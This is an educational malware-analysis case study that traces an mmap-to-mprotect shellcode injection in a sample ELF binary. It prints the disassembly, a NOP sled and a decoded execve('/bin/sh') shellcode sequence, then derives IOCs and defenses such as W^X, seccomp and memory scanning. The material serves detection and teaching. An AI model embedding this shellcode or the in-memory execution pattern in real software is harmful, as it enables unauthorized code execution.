Case Study 34-2: Malware Analysis — Identifying Shellcode in a Binary

Introduction

Malware analysis is one of the most important applications of reverse engineering. Security analysts examine malicious binaries to understand their behavior, extract indicators of compromise (IOCs), and develop defenses. This case study examines a sample binary with characteristics drawn from historical malware patterns: a binary that appears legitimate but contains embedded shellcode and process injection indicators.

🔐 Security Note: This analysis is based on patterns from documented, historical malware behaviors. The techniques described are used by malware analysts at security companies, national CERTs, and incident response teams to understand and defend against threats. No functional attack tools are described or provided. Understanding how these techniques work is essential for defending against them.

The Sample Binary

Our sample, sample.elf, presents itself as a benign utility but contains suspicious code patterns. The goal is to identify the malicious components through static and dynamic analysis.

$ file sample.elf
sample.elf: ELF 64-bit LSB executable, x86-64, dynamically linked, stripped

$ ls -la sample.elf
-rwxr-xr-x 1 analyst analyst 18432 Mar 15 14:22 sample.elf

$ md5sum sample.elf
a1b2c3d4e5f6789012345678abcdef01  sample.elf

Phase 1: Static Triage

Initial string analysis:

$ strings -n 4 sample.elf | sort
/bin/bash
/proc/self/maps
/tmp/.cache
GET / HTTP/1.1
Host: %s
User-Agent: Mozilla/5.0
connect
mmap
mprotect
munmap
open
read
socket
write

Red flags immediately:

- /proc/self/maps: reading its own memory map (suspicious for a "utility")
- /tmp/.cache: writing to a hidden temp file
- mmap, mprotect, munmap: memory allocation with permission changes (shellcode injection pattern)
- Network-related strings alongside /proc/self/maps

$ objdump -T sample.elf
DYNAMIC SYMBOL TABLE:
memcpy
mmap64
mprotect
munmap
socket
connect
send
recv
open
read
write
exit

The combination of mmap/mprotect with network functions (socket, connect, send, recv) is a classic dropper or implant pattern: download shellcode, allocate executable memory, copy and execute.
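The import-based reasoning above can be sketched as a small triage helper. This is a minimal illustration, not an established tool: the function name `triage_imports` and the wording of the findings are assumptions made for this example, and the input list is simply the symbol names shown in the objdump output.

```python
def triage_imports(imports):
    """Return human-readable findings for a collection of imported symbol names."""
    names = set(imports)
    findings = []

    has_alloc = bool(names & {"mmap", "mmap64"})
    has_protect = "mprotect" in names
    has_network = {"socket", "connect"} <= names

    if has_alloc and has_protect:
        findings.append("allocates memory and changes page permissions")
    if has_network:
        findings.append("opens outbound network connections")
    if has_alloc and has_protect and has_network:
        findings.append("combination matches the dropper/implant pattern")
    return findings


# Symbol names as listed in the dynamic symbol table above.
sample_imports = ["mmap64", "mprotect", "munmap", "socket", "connect",
                  "send", "recv", "open", "read", "write", "exit"]

for finding in triage_imports(sample_imports):
    print(finding)
```

A heuristic like this only prioritizes samples for closer inspection. Legitimate programs such as JIT-enabled runtimes import the same functions, so a match is a lead rather than a verdict.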

Phase 2: Identifying the Suspicious Function

Disassemble and look for the mmap call chain:

$ objdump -M intel -d sample.elf | grep -A3 -B3 "call.*mmap"
  401580: bf 00 00 00 00    mov    edi, 0x0          ; addr = NULL
  401585: be 00 10 00 00    mov    esi, 0x1000       ; length = 4096
  40158a: ba 03 00 00 00    mov    edx, 0x3          ; prot = PROT_READ|PROT_WRITE
  40158f: c7 c1 22 00 00 00 mov    ecx, 0x22         ; flags = MAP_PRIVATE|MAP_ANONYMOUS (4th argument of a libc call goes in rcx)
  401595: 45 31 c0          xor    r8d, r8d          ; fd = 0 (ignored with MAP_ANONYMOUS on Linux; portable code passes -1)
  401598: 45 31 c9          xor    r9d, r9d          ; offset = 0
  40159b: e8 xx xx xx xx    call   mmap64@plt
  4015a0: 48 89 45 f8       mov    [rbp-0x8], rax    ; save mapped address

  ; ... copy code to mapped region ...
  ; ... then:

  4015c8: 48 8b 7d f8       mov    rdi, [rbp-0x8]   ; address
  4015cc: be 00 10 00 00    mov    esi, 0x1000       ; length
  4015d1: ba 05 00 00 00    mov    edx, 0x5          ; prot = PROT_READ|PROT_EXEC !!!
  4015d6: e8 xx xx xx xx    call   mprotect@plt      ; make it executable

The PROT_READ|PROT_EXEC (0x5) call to mprotect on memory that was just allocated with MAP_ANONYMOUS is a strong shellcode injection indicator (JIT compilers produce the same sequence, so context matters). The pattern:

  1. mmap(NULL, size, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0): allocate writable memory
  2. Copy code into it
  3. mprotect(addr, size, PROT_READ|PROT_EXEC): make it executable
  4. Call or jump to the new memory

This is the standard pattern for executing shellcode in memory without writing to disk (fileless execution).
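When reading disassembly it helps to decode the numeric arguments mechanically. The sketch below turns the constants seen in the listing (0x3, 0x22, 0x5) into flag names and checks for the writable-then-executable transition. The numeric values are the Linux x86-64 definitions from `<sys/mman.h>`; the helper names `decode_bits` and `is_rw_to_rx` are invented for this illustration.

```python
# Linux x86-64 values from <sys/mman.h>; other platforms may differ.
PROT_BITS = {0x1: "PROT_READ", 0x2: "PROT_WRITE", 0x4: "PROT_EXEC"}
MAP_BITS = {0x01: "MAP_SHARED", 0x02: "MAP_PRIVATE",
            0x10: "MAP_FIXED", 0x20: "MAP_ANONYMOUS"}


def decode_bits(value, table, zero_name):
    """Render a bitmask as the OR of its named flags."""
    if value == 0:
        return zero_name
    names = [name for bit, name in sorted(table.items()) if value & bit]
    leftover = value & ~sum(table)  # bits this table does not know about
    if leftover:
        names.append(hex(leftover))
    return "|".join(names)


def is_rw_to_rx(initial_prot, new_prot):
    """True when a region was mapped writable and later made executable."""
    return bool(initial_prot & 0x2) and bool(new_prot & 0x4)


print(decode_bits(0x3, PROT_BITS, "PROT_NONE"))   # mmap prot argument
print(decode_bits(0x22, MAP_BITS, "0"))           # mmap flags argument
print(decode_bits(0x5, PROT_BITS, "PROT_NONE"))   # mprotect prot argument
print(is_rw_to_rx(0x3, 0x5))
```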

Phase 3: Analyzing the Shellcode

Find the data being copied. Following the code between mmap and mprotect:

  4015a5: 48 8b 45 f8       mov    rax, [rbp-0x8]   ; mapped memory
  4015a9: 48 89 45 f0       mov    [rbp-0x10], rax   ; save dst
  4015ad: 48 8d 35 ac 0a 00 00  lea    rsi, [rip+0xaac]  ; source data (in .data)
  4015b4: 48 8b 7d f0       mov    rdi, [rbp-0x10]   ; dst
  4015b8: ba 48 00 00 00    mov    edx, 0x48         ; 72 bytes
  4015bd: e8 xx xx xx xx    call   memcpy@plt

The shellcode is 72 bytes located in the .data section at RIP+0xaac, which resolves to 0x402060 (RIP here is 0x4015b4, the address of the next instruction). Let's examine it:
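Resolving a RIP-relative operand by hand is a frequent source of off-by-one-instruction mistakes, because RIP refers to the address of the next instruction rather than the current one. The following sketch shows the arithmetic; the function name `rip_relative_target` is hypothetical, and the numbers in the usage lines are illustrative values, not taken from the sample.

```python
def rip_relative_target(insn_addr, insn_len, disp32):
    """Resolve a RIP-relative operand.

    insn_addr: address of the instruction containing the operand
    insn_len:  encoded length of that instruction in bytes
    disp32:    the 32-bit displacement as it appears in the encoding
    """
    # The displacement is a signed 32-bit value.
    if disp32 & 0x80000000:
        disp32 -= 1 << 32
    # RIP holds the address of the NEXT instruction when the operand is evaluated.
    return (insn_addr + insn_len + disp32) & 0xFFFFFFFFFFFFFFFF


# Illustrative values: a 7-byte lea at 0x401000 with a forward displacement...
print(hex(rip_relative_target(0x401000, 7, 0x200)))
# ...and the same instruction with a displacement of -7 (encoded as 0xfffffff9).
print(hex(rip_relative_target(0x401000, 7, 0xFFFFFFF9)))
```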

$ objdump -M intel -s -j .data sample.elf
Contents of section .data:
 402060 90909090 90909090 90909090 90909090  ................   ; NOP sled
 402070 90909090 90909090 90909090 90909090  ................
 402080 90909090 90909090 90909090 90909090  ................
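 402090 48 31 d2 48 bb 2f 2f 62 69 6e 2f    H1.H.//bin/
 40209b 73 68 53 48 89 e7 48 31 c0 b0 3b    shSH..H1..;
 4020a6 0f 05                               ..

This is recognizable shellcode structure:

- 90 90 90 90 ... → NOP sled (48 bytes of NOPs before the actual code)
- 48 31 d2 → xor rdx, rdx
- 48 bb 2f 2f 62 69 6e 2f 73 68 → mov rbx, 0x68732f6e69622f2f (the eight bytes of the string //bin/sh packed little-endian into a 64-bit immediate)
- 53 → push rbx
- 48 89 e7 → mov rdi, rsp (point rdi to the string on the stack)
- 48 31 c0 → xor rax, rax
- b0 3b → mov al, 59 (syscall number 59 = execve)
- 0f 05 → syscall

This follows the classic x86-64 execve("/bin/sh", NULL, NULL) shellcode template, the minimal sequence to spawn a shell. The doubled slash pads the path to exactly eight bytes so that it fills one register. The code is 24 bytes; together with the 48-byte sled it accounts for all 72 bytes passed to memcpy. As listed, it neither pushes a terminating NUL after the string nor clears rsi, so it is an abbreviated form of the template rather than a complete payload. The NOP sled at the front is a historical reliability technique (Chapter 35).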
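A 64-bit immediate carries exactly eight bytes, stored little-endian, which is why strings embedded this way look reversed when written as a hexadecimal integer. The sketch below decodes the eight immediate bytes that follow the 48 bb opcode in the dump; the helper name `decode_imm64` is an assumption for this example.

```python
def decode_imm64(hex_bytes):
    """Decode an 8-byte little-endian immediate into (integer value, ASCII text)."""
    raw = bytes.fromhex(hex_bytes)
    if len(raw) != 8:
        raise ValueError("a 64-bit immediate is exactly 8 bytes")
    value = int.from_bytes(raw, "little")
    # Replace non-printable bytes with '.' the way a hex dump does.
    text = "".join(chr(b) if 0x20 <= b < 0x7F else "." for b in raw)
    return value, text


value, text = decode_imm64("2f 2f 62 69 6e 2f 73 68")
print(hex(value))
print(text)
```

Running the same decoder over every `48 b8`..`48 bf` (mov r64, imm64) operand in a suspicious region is a quick way to surface stack-built strings that `strings` would miss when they are shorter than its minimum length or split across instructions.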

Phase 4: The NOP Sled

A NOP sled (\x90\x90\x90...) is a sequence of no-operation instructions placed before shellcode. Its purpose: if execution lands anywhere in the sled, it slides down to the actual shellcode below. This mattered for stack-based exploits in which the attacker could only estimate the buffer address; once ASLR randomized addresses across a much wider range, a sled of practical size rarely compensated.

Seeing a NOP sled in modern code suggests:

- Code written to be compatible with older exploitation techniques
- Repurposed code from an earlier era
- Deliberate imitation of old shellcode to evade signature-based detection

In this sample, the NOP sled is 48 bytes, two thirds of the 72-byte payload, which suggests it was written to accommodate imprecise landing.
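Locating sleds in a dump can be automated. The following is a minimal sketch that reports runs of the single-byte NOP (0x90) in a byte buffer; the function name `find_nop_sleds` and the default threshold of 16 are choices made for this example. It does not recognize multi-byte NOP encodings or NOP-equivalent instructions, which a more thorough scanner would need to handle.

```python
import re


def find_nop_sleds(data, min_len=16):
    """Return (offset, length) for each run of at least min_len 0x90 bytes."""
    pattern = re.compile(rb"\x90{%d,}" % min_len)
    return [(m.start(), m.end() - m.start()) for m in pattern.finditer(data)]


# Synthetic buffer: 4 bytes of padding, a 48-byte sled, then filler bytes.
buffer = b"\x00" * 4 + b"\x90" * 48 + b"\xcc" * 8
for offset, length in find_nop_sleds(buffer):
    print(f"sled at offset {offset:#x}, {length} bytes")
```

Short runs of 0x90 occur naturally as alignment padding between functions, so the threshold trades false positives against missed short sleds.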

Phase 5: Dynamic Confirmation with GDB

Confirm the analysis by catching the mprotect call:

$ gdb -q sample.elf
(gdb) catch syscall mprotect
Catchpoint 1 (syscall 'mprotect')
(gdb) run

Catchpoint 1 (call to syscall mprotect), 0x00007f... in mprotect ()
(gdb) info registers rdi rsi rdx
rdi  0x7f...a000     ; address of mapped region
rsi  0x1000          ; size 4096
rdx  0x5             ; PROT_READ|PROT_EXEC ← confirmed

(gdb) x/20xb 0x7f...a000
0x7f...a000: 90 90 90 90 90 90 90 90  ; NOP sled
0x7f...a008: 90 90 90 90 90 90 90 90
0x7f...a010: ...

(gdb) # Return from mprotect to the caller
(gdb) finish
(gdb) # Single-step toward the indirect call/jmp into the shellcode
(gdb) stepi

The analysis confirms: memory allocated, shellcode copied, permissions changed to executable. The shellcode will execute next.

Phase 6: Indicators of Compromise

From this analysis, we can extract IOCs:

- MD5 hash of the binary
- The shellcode bytes (for signature detection): 48 31 d2 48 bb 2f 2f 62 69 6e 2f 73 68 53 48 89 e7 48 31 c0 b0 3b 0f 05
- The NOP sled signature: 16+ consecutive 0x90 bytes
- The behavioral pattern: mmap → memcpy → mprotect(PROT_EXEC) → indirect call
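Static IOCs of this kind can be collected programmatically. The sketch below builds a small record from a byte buffer: file hashes plus the offsets of two byte patterns discussed in the analysis, the `b0 3b 0f 05` tail (mov al, 59; syscall) and the `/bin/sh` path. The record layout and the names `find_all` and `build_ioc_record` are assumptions for illustration, and SHA-256 is included alongside MD5 as a common practice rather than something the analysis above requires.

```python
import hashlib

EXECVE_TAIL = bytes.fromhex("b0 3b 0f 05")  # mov al, 59 ; syscall


def find_all(data, needle):
    """Return every offset at which needle occurs in data."""
    offsets = []
    start = data.find(needle)
    while start != -1:
        offsets.append(start)
        start = data.find(needle, start + 1)
    return offsets


def build_ioc_record(data):
    """Collect hashes and pattern offsets for a binary blob."""
    return {
        "md5": hashlib.md5(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
        "execve_tail_offsets": find_all(data, EXECVE_TAIL),
        "bin_sh_offsets": find_all(data, b"/bin/sh"),
    }


# Synthetic buffer standing in for file contents.
blob = b"\x90" * 4 + b"//bin/sh" + EXECVE_TAIL
record = build_ioc_record(blob)
print(record["execve_tail_offsets"], record["bin_sh_offsets"])
```

In practice the input would be the bytes of the file under analysis, for example `open(path, "rb").read()`. Four-byte patterns such as the execve tail are short enough to match by coincidence, so they are best combined with the other indicators.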

Defensive Implications

Understanding this attack pattern motivates several defenses:

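  1. W^X (Write XOR Execute): Memory pages should never be simultaneously writable and executable. Stock Linux kernels still permit PROT_READ|PROT_WRITE|PROT_EXEC mappings; enforcement comes from hardening layers such as SELinux (the execmem permission) or PaX MPROTECT. This sample's separate mmap (RW) and mprotect (RX) calls never hold a page writable and executable at the same time, so they satisfy a simple W^X check. Stopping it requires a policy that also refuses to make anonymous memory executable.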

  2. seccomp-bpf: Restricts the system calls available to a process. A filter can inspect the prot argument, so if mprotect with PROT_EXEC were blocked, this technique would fail. Many sandboxes implement this.

  3. Integrity Monitoring: Detecting when executable memory is created at runtime (not from a mapped file). Tools like Falco or auditd can alert on mprotect calls that add PROT_EXEC.

  4. Memory Scanning: Scanning for NOP sled signatures in process memory is a detection technique used by some EDR products.

  5. Code Signing / Executable Whitelisting: Preventing execution of code not from signed files. mmap-and-execute bypasses this in older implementations; newer implementations (like Apple's Hardened Runtime) explicitly block JIT without entitlement.
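The integrity-monitoring idea in item 3 can be approximated from user space by inspecting a process's memory map. The sketch below parses text in the `/proc/<pid>/maps` format and reports executable mappings that have no backing file. The function name `anonymous_exec_regions` is hypothetical, and the sample text is made up for the example rather than captured from the binary.

```python
def anonymous_exec_regions(maps_text):
    """Return (start, end, perms) for executable mappings with no backing file."""
    regions = []
    for line in maps_text.splitlines():
        fields = line.split(None, 5)
        if len(fields) < 5:
            continue
        addr_range, perms, _offset, _dev, inode = fields[:5]
        path = fields[5].strip() if len(fields) > 5 else ""
        if "x" not in perms:
            continue
        # Anonymous mappings have inode 0 and an empty path. Kernel-provided
        # regions such as [vdso] carry a bracketed name and are skipped.
        if inode == "0" and path == "":
            start, end = (int(part, 16) for part in addr_range.split("-"))
            regions.append((start, end, perms))
    return regions


# Made-up example in /proc/<pid>/maps format.
sample_maps = "\n".join([
    "00400000-00402000 r-xp 00000000 08:01 131090 /home/analyst/sample.elf",
    "7f3a1c000000-7f3a1c001000 r-xp 00000000 00:00 0",
    "7ffd5a1fe000-7ffd5a200000 r-xp 00000000 00:00 0 [vdso]",
])

for start, end, perms in anonymous_exec_regions(sample_maps):
    print(f"{start:#x}-{end:#x} {perms}")
```

JIT-compiling runtimes create such regions legitimately, so a monitor built on this idea usually needs a list of expected processes before alerting.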

Lessons for Defenders

This analysis demonstrates what a malware analyst does in practice: identify the high-level behavior from strings and imports, trace the suspicious code paths in the disassembly, confirm the behavior in GDB, and extract actionable IOCs. No single technique is sufficient — the combination of string analysis, dynamic import inspection, disassembly, and dynamic tracing gives a complete picture.

Understanding shellcode at the assembly level is what allows analysts to recognize it in compressed, obfuscated, or network-transmitted form. Once the payload is decoded, the execve syscall sequence (mov al, 59 followed by syscall) is identifiable regardless of how the surrounding code is structured.